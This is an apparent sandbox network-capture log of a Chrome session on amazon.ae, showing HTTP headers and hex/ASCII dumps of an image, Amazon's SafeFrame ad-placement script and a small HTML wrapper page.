                                                                                                                                                                                                                                                                X-Amz-Ir-Id: 3edb6a12-5c48-420a-af14-45e0d938299d
                                                                                                                                                                                                                                                                Date: Thu, 06 Jun 2024 08:49:22 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 23 Jan 2023 14:44:12 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-258,/images/G/39/consumables_uae/Amazonbasket/XCM_Manual_1532278_5307764_400x39_2X
                                                                                                                                                                                                                                                                Expires: Wed, 01 Jun 2044 08:49:22 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-258 /images/G/39/consumables_uae/Amazonbasket/XCM_Manual_1532278_5307764_400x39_2X
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 411234c039d8f1de63b7f2192e5e24d4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 498507
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: t5QRNE7OVBTdAFUeA0EjjYK-H_9SoD8C3R7yFmHJBWU07hAwfvWodg==
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC9461INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0a 09 0a 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c2 00 11 08 00 27 01 90 03 01 11 00 02 11 01 03 11 01 ff c4 00 37 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 02 03 05 06 08 07 04 09 00 01 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 02 01 04 05 06 07 03 00 08 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fa 5f f0 0e c2 2a ab 32 a3 db ea
                                                                                                                                                                                                                                                                Data Ascii: JFIF'7_*2


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                33192.168.2.449868151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC616OUTGET /images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1375INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 48888
                                                                                                                                                                                                                                                                Content-Type: text/javascript
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 46daee71-1e80-4bd2-8a0a-6255bc1c8421
                                                                                                                                                                                                                                                                Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 08 Aug 2024 13:22:39 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 345543
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:25 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200147-IAD, cache-nyc-kteb1890021-NYC
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC75INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 28 28 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 2e 64 65 66 61 75 6c 74 3a 65 7d 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 3a 22 29 7d 2c 69 3d 2f 28 5c 2f 62 7c 5c 2f 73 7c 5c 2f 6c 29 2e 2a 28 6e 6f 64 65 3d 29 28 5c 64 7b 31 2c 31 32 7d 29 2f 2c 6e 3d 6e 65 77 20 4d 61 70 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 6e 2e 68 61 73 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 29 7b 76 61 72 20 65 3d 69 2e 65 78 65 63 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 74 3d 65 26 26 65 5b 33 5d 3f 65 5b 33 5d 3a 6e 75 6c 6c 3b 6e 2e 73 65 74 28
                                                                                                                                                                                                                                                                Data Ascii: (()=>{function e(e){return e&&e.__esModule?e.default:e}var t=function(e){return e.replace(/_/g,":")},i=/(\/b|\/s|\/l).*(node=)(\d{1,12})/,n=new Map,a=function(){if(!n.has(window.location.href)){var e=i.exec(window.location.href),t=e&&e[3]?e[3]:null;n.set(
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 20 45 72 72 6f 72 28 65 29 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 69 66 28 77 69 6e 64 6f 77 2e 63 73 61 29 74 72 79 7b 77 69 6e 64 6f 77 2e 63 73 61 28 22 43 6f 6e 74 65 6e 74 22 2c 7b 65 6c 65 6d 65 6e 74 3a 65 7d 29 28 22 6d 61 72 6b 22 2c 74 2c 6e 75 6c 6c 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 67 65 74 54 69 6d 65 28 29 29 7d 63 61 74 63 68 28 6e 29 7b 75 28 22 45 72 72 6f 72 20 77 69 74 68 20 27 6d 61 72 6b 27 20 43 53 41 22 2c 6e 29 7d 7d 3b 63 6c 61 73 73 20 79 7b 73 65 6e 64 4c 61 74 65 6e 63 79 4d 65 74 72 69 63 28 7b 6c 61 74 65 6e 63 79 4d 65 74 72 69 63 54 79 70 65 3a 65 2c 70 6c 61 63 65 6d 65 6e 74 49 64 3a 74 2c 70 6c 61 63 65 6d 65 6e 74 4e 61 6d 65 3a 69 2c 70 6c 61 63 65 6d 65 6e 74 44 69 76 49 64 3a 6e 2c 74 69 6d
                                                                                                                                                                                                                                                                Data Ascii: Error(e)},g=function(e,t,i){if(window.csa)try{window.csa("Content",{element:e})("mark",t,null==i?void 0:i.getTime())}catch(n){u("Error with 'mark' CSA",n)}};class y{sendLatencyMetric({latencyMetricType:e,placementId:t,placementName:i,placementDivId:n,tim
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 65 2b 2b 29 7b 63 6f 6e 73 74 20 74 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 6b 65 79 28 65 29 3b 69 66 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 73 74 61 72 74 73 57 69 74 68 28 41 29 29 7b 63 6f 6e 73 74 20 69 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 74 29 3b 69 66 28 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 74 29 2c 65 3d 2d 31 2c 6e 75 6c 6c 3d 3d 3d 69 29 63 6f 6e 74 69 6e 75 65 3b 79 69 65 6c 64 5b 74 2c 69 5d 7d 7d 7d 7d 63 6f 6e 73 74 20 44 3d 28 65 2c 74 2c 69 29 3d 3e 7b 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 45 28 65 2c 74 29 2c 69 29 7d 2c 4d 3d 28 65 2c 74 2c 69 29 3d 3e 28 2e 2e 2e 6e 29 3d 3e 7b 74 72 79 7b 65 28 2e 2e 2e 6e 29 7d 63 61 74 63 68 28
                                                                                                                                                                                                                                                                Data Ascii: e++){const t=localStorage.key(e);if(null==t?void 0:t.startsWith(A)){const i=localStorage.getItem(t);if(localStorage.removeItem(t),e=-1,null===i)continue;yield[t,i]}}}}const D=(e,t,i)=>{localStorage.setItem(E(e,t),i)},M=(e,t,i)=>(...n)=>{try{e(...n)}catch(
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 28 4f 28 65 29 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 74 29 2c 69 29 7d 3b 70 28 65 2c 69 2e 69 64 2c 6e 29 2c 70 28 65 2c 73 28 69 2e 69 64 29 2c 6e 29 2c 70 28 65 2c 74 28 69 2e 6e 61 6d 65 29 2c 6e 29 2c 70 28 65 2c 6f 28 74 28 69 2e 6e 61 6d 65 29 29 2c 6e 29 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 69 2c 6e 2c 61 2c 6f 2c 73 2c 72 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 21 57 28 29 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 73 61 66 65 66 72 61 6d 65 3d 6e 75 6c 6c 21 3d 3d 28 69 3d 77 69 6e 64 6f 77 2e 73 61 66 65 66 72 61 6d 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 3f 69 3a 7b 7d 2c 77 69 6e 64 6f 77 2e 73 61 66 65 66 72 61 6d 65 2e 63 73 6d 43 61 63 68 65 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 77 69
                                                                                                                                                                                                                                                                Data Ascii: (O(e),":").concat(t),i)};p(e,i.id,n),p(e,s(i.id),n),p(e,t(i.name),n),p(e,o(t(i.name)),n)},H=function(e,t){var i,n,a,o,s,r;if(void 0===t&&(t=1),!W())return window.safeframe=null!==(i=window.safeframe)&&void 0!==i?i:{},window.safeframe.csmCache=null!==(n=wi
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 69 66 72 61 6d 65 3a 69 6e 6e 65 72 68 74 6d 6c 3a 65 78 69 73 74 22 29 3a 28 48 28 22 67 65 74 69 66 72 61 6d 65 3a 61 64 6d 61 70 3a 69 66 72 61 6d 65 3a 69 6e 6e 65 72 68 74 6d 6c 3a 75 6e 64 65 66 69 6e 65 64 22 29 2c 69 5b 74 5d 2e 69 66 72 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 7c 7c 48 28 22 67 65 74 69 66 72 61 6d 65 3a 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 3a 75 6e 64 65 66 69 6e 65 64 22 29 29 3a 48 28 22 67 65 74 69 66 72 61 6d 65 3a 61 64 6d 61 70 3a 69 66 72 61 6d 65 3a 75 6e 64 65 66 69 6e 65 64 22 29 3b 72 65 74 75 72 6e 20 69 5b 74 5d 2e 69 66 72 61 6d 65 7d 2c 71 3d 5b 7b 70 3a 35 30 2c 74 3a 32 2c 64 65
                                                                                                                                                                                                                                                                Data Ascii: iframe:innerhtml:exist"):(H("getiframe:admap:iframe:innerhtml:undefined"),i[t].iframe=document.getElementById(a),document.getElementById(a)||H("getiframe:getElementById:undefined")):H("getiframe:admap:iframe:undefined");return i[t].iframe},q=[{p:50,t:2,de
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 2c 69 2e 62 29 2d 69 2e 74 29 2c 72 3d 6f 2a 73 2f 28 69 2e 68 2a 4d 61 74 68 2e 6d 69 6e 28 69 2e 77 2c 61 29 29 3b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 4d 61 74 68 2e 6d 69 6e 28 31 2c 4d 61 74 68 2e 6d 61 78 28 30 2c 72 29 29 2e 74 6f 46 69 78 65 64 28 32 29 29 7d 28 65 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 22 75 6e 6b 6e 6f 77 6e 22 3a 74 3e 3d 2e 35 7d 2c 69 65 3d 65 3d 3e 30 3d 3d 3d 65 2e 77 69 64 74 68 26 26 30 3d 3d 3d 65 2e 68 65 69 67 68 74 3b 63 6f 6e 73 74 20 6e 65 3d 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 59 28 29 2c 69 3d 4a 28 29 2c 6e 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 72 65 28 65 2e 74 2c 65 2e 62 2c 69 29 29 2c 61 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 72 65 28 65 2e 6c 2c 65 2e 72 2c 74 29 29 2c 6f 3d 6e 2a 61 2c 73 3d 65
                                                                                                                                                                                                                                                                Data Ascii: ,i.b)-i.t),r=o*s/(i.h*Math.min(i.w,a));return Number(Math.min(1,Math.max(0,r)).toFixed(2))}(e);return null==t?"unknown":t>=.5},ie=e=>0===e.width&&0===e.height;const ne=e=>{const t=Y(),i=J(),n=Math.max(0,re(e.t,e.b,i)),a=Math.max(0,re(e.l,e.r,t)),o=n*a,s=e
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 69 6e 64 6f 77 2e 73 63 72 6f 6c 6c 58 2d 65 2e 6f 72 69 67 69 6e 61 6c 53 63 72 6f 6c 6c 58 29 3b 72 65 74 75 72 6e 7b 74 6f 70 3a 69 2c 62 6f 74 74 6f 6d 3a 6e 2c 6c 65 66 74 3a 61 2c 72 69 67 68 74 3a 61 2b 65 2e 61 64 57 69 64 74 68 2c 77 69 64 74 68 3a 65 2e 61 64 57 69 64 74 68 2c 68 65 69 67 68 74 3a 65 2e 61 64 48 65 69 67 68 74 7d 7d 2c 70 65 3d 22 62 74 72 5f 63 6c 69 65 6e 74 22 2c 68 65 3d 22 63 6f 64 5f 63 6c 69 65 6e 74 22 2c 75 65 3d 22 6c 6f 63 61 6c 73 74 6f 72 61 67 65 5f 69 6d 70 72 65 73 73 69 6f 6e 22 2c 77 65 3d 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 20 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 72 65 74 75 72 6e 20 69 2e 69 64 3d 65 2c 69 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79
                                                                                                                                                                                                                                                                Data Ascii: indow.scrollX-e.originalScrollX);return{top:i,bottom:n,left:a,right:a+e.adWidth,width:e.adWidth,height:e.adHeight}},pe="btr_client",he="cod_client",ue="localstorage_impression",we=(e,t)=>{const i=document.createElement("img");return i.id=e,i.style.display
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 72 6f 6d 54 6f 70 24 2f 67 2e 65 78 65 63 28 65 29 3b 69 66 28 21 4d 65 28 65 29 29 7b 69 66 28 65 2e 6d 61 74 63 68 28 22 5b 5e 3a 5d 2b 3a 2e 2b 22 29 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 73 70 6c 69 74 28 22 3a 22 29 2c 6e 3d 74 5b 31 5d 2c 61 3d 74 2e 6c 65 6e 67 74 68 3e 32 3f 74 5b 32 5d 3a 6e 3b 69 66 28 69 29 72 65 74 75 72 6e 20 61 77 61 69 74 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 65 3d 3e 50 2e 77 68 65 6e 28 61 2c 22 41 22 29 2e 65 78 65 63 75 74 65 28 65 29 29 29 3b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 4e 65 65 64 20 41 55 49 20 6f 72 20 41 6d 61 7a 6f 6e 4a 51 20 69 6e 73 74 61 6c 6c 65 64 22 29 7d 72 65 74 75 72 6e 20 65 2e 6d 61 74 63 68 28 2f 5e 5c 64 7b 31 2c 34 7d 70 78 24 2f 67 29 3f 61 77 61 69 74 20 50 65 28 70 61 72
                                                                                                                                                                                                                                                                Data Ascii: romTop$/g.exec(e);if(!Me(e)){if(e.match("[^:]+:.+")){const t=e.split(":"),n=t[1],a=t.length>2?t[2]:n;if(i)return await new Promise((e=>P.when(a,"A").execute(e)));throw new Error("Need AUI or AmazonJQ installed")}return e.match(/^\d{1,4}px$/g)?await Pe(par
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 22 2b 74 2e 69 64 2c 6d 65 74 72 69 63 56 61 6c 75 65 3a 69 7d 2c 7b 65 6e 74 3a 22 61 6c 6c 22 7d 29 7d 63 61 74 63 68 28 6e 29 7b 75 28 22 45 72 72 6f 72 20 77 69 74 68 20 27 6c 6f 67 43 73 61 45 76 65 6e 74 27 20 43 53 41 22 2c 6e 29 7d 7d 2c 5f 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 77 69 6e 64 6f 77 2e 63 73 61 29 74 72 79 7b 77 69 6e 64 6f 77 2e 63 73 61 28 22 45 76 65 6e 74 73 22 2c 7b 70 72 6f 64 75 63 65 72 49 64 3a 22 61 64 70 6c 61 63 65 6d 65 6e 74 73 22 7d 29 28 22 6c 6f 67 22 2c 7b 73 63 68 65 6d 61 49 64 3a 22 41 70 65 53 61 66 65 66 72 61 6d 65 2e 63 73 61 45 76 65 6e 74 2e 31 22 2c 6d 65 74 72 69 63 4e 61 6d 65 3a 65 2c 6d 65 74 72 69 63 56 61 6c 75 65 3a 74 7d 2c 7b
                                                                                                                                                                                                                                                                Data Ascii: "+t.id,metricValue:i},{ent:"all"})}catch(n){u("Error with 'logCsaEvent' CSA",n)}},_e=function(e,t){if(void 0===t&&(t=1),window.csa)try{window.csa("Events",{producerId:"adplacements"})("log",{schemaId:"ApeSafeframe.csaEvent.1",metricName:e,metricValue:t},{


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                34192.168.2.449867151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC613OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1366INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 9989c84c-d92a-4437-93c1-a28cf89f9497
                                                                                                                                                                                                                                                                Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 08 Aug 2024 13:22:36 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 345543
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:25 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000154-IAD, cache-nyc-kteb1890044-NYC
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC75INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC167INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 66 2d 31 2e 35 30 2e 31 36 37 35 35 65 30 62 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><style>body{background-color:transparent;margin:0;padding:0}</style></head><body> <script src="sf-1.50.16755e0b.js" ></script></body></html>


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                35192.168.2.449870151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC694OUTGET /images/G/39/Associates/XCM_Manual_Coupons_DQC_44b7c125-ee97-441e-9257-50452eb12b8c._SY116_CB613590867_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3030
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 581b345a-1d2a-4659-a28b-882d270b8216
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 06 Feb 2023 12:27:45 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Fri, 01 Apr 2044 18:51:15 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1380030
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:25 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200174-IAD, cache-nyc-kteb1890058-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
